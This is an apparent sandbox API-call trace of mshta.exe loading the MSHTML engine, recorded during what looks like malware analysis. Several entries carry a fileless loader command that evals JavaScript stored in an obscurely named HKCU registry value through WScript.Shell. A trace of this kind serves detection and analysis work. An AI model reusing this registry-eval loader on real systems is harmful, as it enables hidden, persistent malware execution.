NtdllDefWindowProc_W () returned 0x1 [0065.609] NtdllDefWindowProc_W () returned 0x0 [0065.609] NtdllDefWindowProc_W () returned 0x0 [0065.610] SetWindowLongW (hWnd=0x40162, nIndex=-16, dwNewLong=-2100363264) returned 114229248 [0065.610] NtdllDefWindowProc_W () returned 0x0 [0065.610] NtdllDefWindowProc_W () returned 0x0 [0065.610] NtdllDefWindowProc_W () returned 0x0 [0065.611] NtdllDefWindowProc_W () returned 0x0 [0065.611] NtdllDefWindowProc_W () returned 0x0 [0065.611] NtdllDefWindowProc_W () returned 0x0 [0065.611] SetWindowPos (hWnd=0x40162, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0065.611] NtdllDefWindowProc_W () returned 0x0 [0065.611] NtdllDefWindowProc_W () returned 0x0 [0065.612] NtdllDefWindowProc_W () returned 0x0 [0065.612] NtdllDefWindowProc_W () returned 0x0 [0065.613] NtdllDefWindowProc_W () returned 0x0 [0065.614] SendMessageW (hWnd=0x40162, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0065.614] NtdllDefWindowProc_W () returned 0x0 [0065.614] NtdllDefWindowProc_W () returned 0x0 [0065.619] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xd2) returned 0x63b2d8 [0065.619] PathRemoveArgsW (in: pszPath="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"" | out: pszPath="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"") [0065.621] PathRemoveBlanksW (in: pszPath="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"" | out: pszPath="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"") [0065.621] PathUnquoteSpacesW (in: lpsz="\"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"" | out: lpsz="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 1 [0065.623] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppmk=0x18f904*=0x0, dwFlags=0x1 | out: ppmk=0x18f904*=0x620638) returned 0x0 [0065.720] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63b2d8 | out: hHeap=0x610000) returned 1 [0065.720] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f140 [0065.720] CoCreateInstance (in: rclsid=0x74c29770*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74cab75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x750296d4 | out: ppv=0x750296d4*=0x6421f8) returned 0x0 [0065.722] DllGetClassObject (in: rclsid=0x640bd0*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7666ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ebb4 | out: ppv=0x18ebb4*=0x75028cb0) returned 0x0 [0065.722] IClassFactory:CreateInstance (in: This=0x75028cb0, pUnkOuter=0x0, riid=0x18f560*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18eba0 | out: ppvObject=0x18eba0*=0x6421f8) returned 0x0 [0065.722] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2a8) returned 0x63de18 [0065.822] GetCurrentThreadId () returned 0x2a8 [0065.931] RegisterClassExW (param_1=0x18ea4c) returned 0xc16a [0065.931] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc16a, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x74af0000, lpParam=0x0) returned 0x202ac [0065.932] GetWindowLongW (hWnd=0x202ac, nIndex=-20) returned 0 [0065.932] NtdllDefWindowProc_W () returned 0x1 [0065.932] NtdllDefWindowProc_W () returned 0x0 [0065.932] NtdllDefWindowProc_W () returned 0x0 [0065.932] NtdllDefWindowProc_W () returned 0x0 [0065.932] NtdllDefWindowProc_W () returned 0x0 [0065.933] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f158 [0065.933] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f170 [0065.933] CreateCompatibleDC (hdc=0x0) returned 0x3010a0f [0065.933] GetDeviceCaps (hdc=0x3010a0f, index=90) returned 96 [0065.933] GetDeviceCaps (hdc=0x3010a0f, index=88) returned 96 [0065.933] GetSystemMetrics (nIndex=68) returned 4 [0065.933] GetSystemMetrics (nIndex=69) returned 4 [0065.933] GetSystemMetrics (nIndex=2) returned 17 [0065.933] GetSystemMetrics (nIndex=3) returned 17 [0065.933] GetStockObject (i=13) returned 0x18a002e [0065.933] SelectObject (hdc=0x3010a0f, h=0x18a002e) returned 0x18a002e [0065.933] GetTextMetricsW (in: hdc=0x3010a0f, lptm=0x18eae4 | out: lptm=0x18eae4) returned 1 [0065.933] SelectObject (hdc=0x3010a0f, h=0x18a002e) returned 0x18a002e [0065.933] DeleteObject (ho=0x18a002e) returned 1 [0065.933] GetSystemDefaultLCID () returned 0x409 [0065.933] GetUserDefaultLCID () returned 0x409 [0065.933] GetACP () returned 0x4e4 [0065.933] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x18ea58, cchData=41 | out: lpLCData="1") returned 2 [0065.933] _wtoi (_String="1") returned 1 [0065.934] RegCloseKey (hKey=0x0) returned 0x6 [0065.934] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x18eaac, cchData=16 | out: lpLCData="0123456789") returned 11 [0065.934] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x7502b038, fWinIni=0x0 | out: pvParam=0x7502b038) returned 1 [0065.934] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x18eb20, fWinIni=0x0 | out: pvParam=0x18eb20) returned 1 [0065.934] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc0) returned 0x641ea0 [0065.934] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f188 [0065.934] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xa4) returned 0x63e0c8 [0065.934] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x6333c8 [0065.934] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1c) returned 0x63aac0 [0065.934] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x6290e0 [0065.934] GetSystemWindowsDirectoryW (in: lpBuffer=0x18e92c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0065.934] lstrlenW (lpString="C:\\Windows") returned 10 [0065.935] lstrlenW (lpString="\\WindowsShell.manifest") returned 22 [0065.935] CreateActCtxW (pActCtx=0x18e908) returned 0x63e17c [0065.936] ActivateActCtx (in: hActCtx=0x63e17c, lpCookie=0x18e8d8 | out: hActCtx=0x63e17c, lpCookie=0x18e8d8) returned 1 [0065.936] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x754a0000 [0065.952] DeactivateActCtx (dwFlags=0x0, ulCookie=0x127a0001) returned 1 [0065.952] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0065.953] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32 [0065.953] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8 [0065.953] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32 [0065.953] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e538, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.953] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18e740, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0065.954] GetCurrentProcess () returned 0xffffffff [0065.954] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x18e948, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9 [0065.954] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0065.954] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x6333e8 [0065.954] FindAtomW (lpString="TridentEnableHiRes") returned 0x0 [0065.954] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x18e524, pvData=0x18e530, pcbData=0x18e52c*=0x4 | out: pdwType=0x18e524*=0x0, pvData=0x18e530, pcbData=0x18e52c*=0x4) returned 0x2 [0065.955] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18e49c | out: phkResult=0x18e49c*=0x154) returned 0x0 [0065.955] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18e4a0 | out: phkResult=0x18e4a0*=0x150) returned 0x0 [0065.955] RegOpenKeyExW (in: hKey=0x150, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x18e45c | out: phkResult=0x18e45c*=0x0) returned 0x2 [0065.955] RegOpenKeyExW (in: hKey=0x154, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x18e45c | out: phkResult=0x18e45c*=0x0) returned 0x2 [0065.955] RegCloseKey (hKey=0x0) returned 0x6 [0065.955] RegCloseKey (hKey=0x0) returned 0x6 [0065.955] RegCloseKey (hKey=0x154) returned 0x0 [0065.955] RegCloseKey (hKey=0x150) returned 0x0 [0065.956] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x97c) returned 0x6421f8 [0065.956] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x480) returned 0x642b80 [0065.956] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.956] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.956] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.956] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0065.956] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x63b318 [0065.956] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x63e9c8 [0065.957] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x63ea20 [0065.957] GetCurrentThreadId () returned 0x2a8 [0065.957] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f248 [0065.957] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2c) returned 0x62d718 [0065.957] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x80) returned 0x63ea78 [0065.957] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc169 [0065.957] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x633408 [0065.958] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1 [0065.959] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x75028cd4, dwReserved=0x0 | out: ppSM=0x75028cd4*=0x63eb00) returned 0x0 [0065.964] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x64) returned 0x63eb68 [0066.043] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x643448 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x28) returned 0x62d030 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x633428 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x629130 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x629180 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x6434a0 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x64) returned 0x643508 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x6291d0 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x643578 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xec) returned 0x643850 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x629220 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x629270 [0066.044] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x6292c0 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x6435e0 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x643948 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x629310 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x629360 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x90) returned 0x6439b0 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x140) returned 0x643a48 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8) returned 0x63b870 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x28) returned 0x62d060 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x633448 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xd0) returned 0x63cb90 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x38) returned 0x63b370 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x128) returned 0x643b90 [0066.045] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x148) returned 0x643cc0 [0066.045] GetCurrentThreadId () returned 0x2a8 [0066.046] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x5c) returned 0x643e10 [0066.046] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x633468 [0066.046] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x18e84c | out: ppURI=0x18e84c*=0x63baa4) returned 0x0 [0066.046] IUri:GetPropertyDWORD (in: This=0x63baa4, uriProp=0x11, pdwProperty=0x18e834, dwFlags=0x0 | out: pdwProperty=0x18e834*=0x11) returned 0x0 [0066.046] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x64292c, dwReserved=0x0 | out: ppSM=0x64292c*=0x643e78) returned 0x0 [0066.047] IInternetSecurityManager:SetSecuritySite (This=0x643e78, pSite=0x642934) returned 0x0 [0066.047] IUnknown:AddRef (This=0x642934) returned 0x28 [0066.047] IUnknown:QueryInterface (in: This=0x642934, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18e804 | out: ppvObject=0x18e804*=0x642938) returned 0x0 [0066.047] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x643ea0 | out: ppvObject=0x643ea0*=0x0) returned 0x80004002 [0066.047] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x643e9c | out: ppvObject=0x643e9c*=0x0) returned 0x80004002 [0066.047] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x643e98 | out: ppvObject=0x643e98*=0x0) returned 0x80004002 [0066.047] IUnknown:Release (This=0x642938) returned 0x0 [0066.047] IInternetSecurityManager:GetSecurityId (in: This=0x643e78, pwszUrl="about:blank", pbSecurityId=0x18e8a0, pcbSecurityId=0x18e894*=0x200, dwReserved=0x0 | out: pbSecurityId=0x18e8a0*=0x61, pcbSecurityId=0x18e894*=0xf) returned 0x0 [0066.117] DllGetClassObject (in: rclsid=0x640c04*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x18de20*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18d4d8 | out: ppv=0x18d4d8*=0x75028c70) returned 0x0 [0066.117] IUnknown:AddRef (This=0x75028c70) returned 0x1 [0066.118] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.118] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e09c | out: ppvObject=0x18e09c*=0x75028c70) returned 0x0 [0066.118] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.118] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18e25c | out: ppvObject=0x18e25c*=0x75028c7c) returned 0x0 [0066.118] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.118] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x633528, cchResult=0xc, pcchResult=0x18e2a4, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x18e2a4*=0xc) returned 0x0 [0066.118] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1c) returned 0x644ab0 [0066.118] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.118] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644ab0 | out: hHeap=0x610000) returned 1 [0066.118] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.119] DllGetClassObject (in: rclsid=0x640c04*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e170 | out: ppv=0x18e170*=0x75028c70) returned 0x0 [0066.119] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18e25c | out: ppvObject=0x18e25c*=0x75028c7c) returned 0x0 [0066.119] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.119] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x633528, cchResult=0xc, pcchResult=0x18e2b4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x18e2b4*=0x0) returned 0x800c0011 [0066.119] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.119] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.120] IUnknown:Release (This=0x63baa4) returned 0x2 [0066.120] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.120] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xf) returned 0x63f290 [0066.120] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f2c0 [0066.120] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x18e874, dwReserved=0x0 | out: ppSM=0x18e874*=0x646678) returned 0x0 [0066.120] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xf) returned 0x63f308 [0066.121] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x6487c0 [0066.121] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18ea24 | out: phkResult=0x18ea24*=0x198) returned 0x0 [0066.121] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18ea28 | out: phkResult=0x18ea28*=0x1a4) returned 0x0 [0066.121] RegOpenKeyExW (in: hKey=0x1a4, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x18e9e4 | out: phkResult=0x18e9e4*=0x0) returned 0x2 [0066.121] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x18e9e4 | out: phkResult=0x18e9e4*=0x0) returned 0x2 [0066.121] RegCloseKey (hKey=0x0) returned 0x6 [0066.121] RegCloseKey (hKey=0x0) returned 0x6 [0066.121] RegCloseKey (hKey=0x198) returned 0x0 [0066.121] RegCloseKey (hKey=0x1a4) returned 0x0 [0066.122] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x128) returned 0x649880 [0066.122] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x648818 [0066.122] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f338 [0066.122] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2000) returned 0x6499b0 [0066.122] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x64b9b8 [0066.122] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64b9b8 | out: hHeap=0x610000) returned 1 [0066.122] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.122] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x18e868 | out: ppURI=0x18e868*=0x63baa4) returned 0x0 [0066.123] DllGetClassObject (in: rclsid=0x640c04*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e140 | out: ppv=0x18e140*=0x75028c70) returned 0x0 [0066.123] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18e22c | out: ppvObject=0x18e22c*=0x75028c7c) returned 0x0 [0066.123] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.123] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x633528, cchResult=0xc, pcchResult=0x18e274, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x18e274*=0xc) returned 0x0 [0066.123] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1c) returned 0x644ab0 [0066.123] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.124] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644ab0 | out: hHeap=0x610000) returned 1 [0066.124] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.124] DllGetClassObject (in: rclsid=0x640c04*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e140 | out: ppv=0x18e140*=0x75028c70) returned 0x0 [0066.124] IUnknown:QueryInterface (in: This=0x75028c70, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18e22c | out: ppvObject=0x18e22c*=0x75028c7c) returned 0x0 [0066.124] IUnknown:Release (This=0x75028c70) returned 0x1 [0066.124] IInternetProtocolInfo:ParseUrl (in: This=0x75028c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x633528, cchResult=0xc, pcchResult=0x18e284, dwReserved=0x0 | out: pwzResult="", pcchResult=0x18e284*=0x0) returned 0x800c0011 [0066.124] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.124] IUnknown:Release (This=0x75028c7c) returned 0x1 [0066.125] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.125] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.125] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0066.126] IUnknown:Release (This=0x63baa4) returned 0x2 [0066.126] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2c) returned 0x62d750 [0066.126] RtlAllocateHeap (HeapHandle=0x610000, 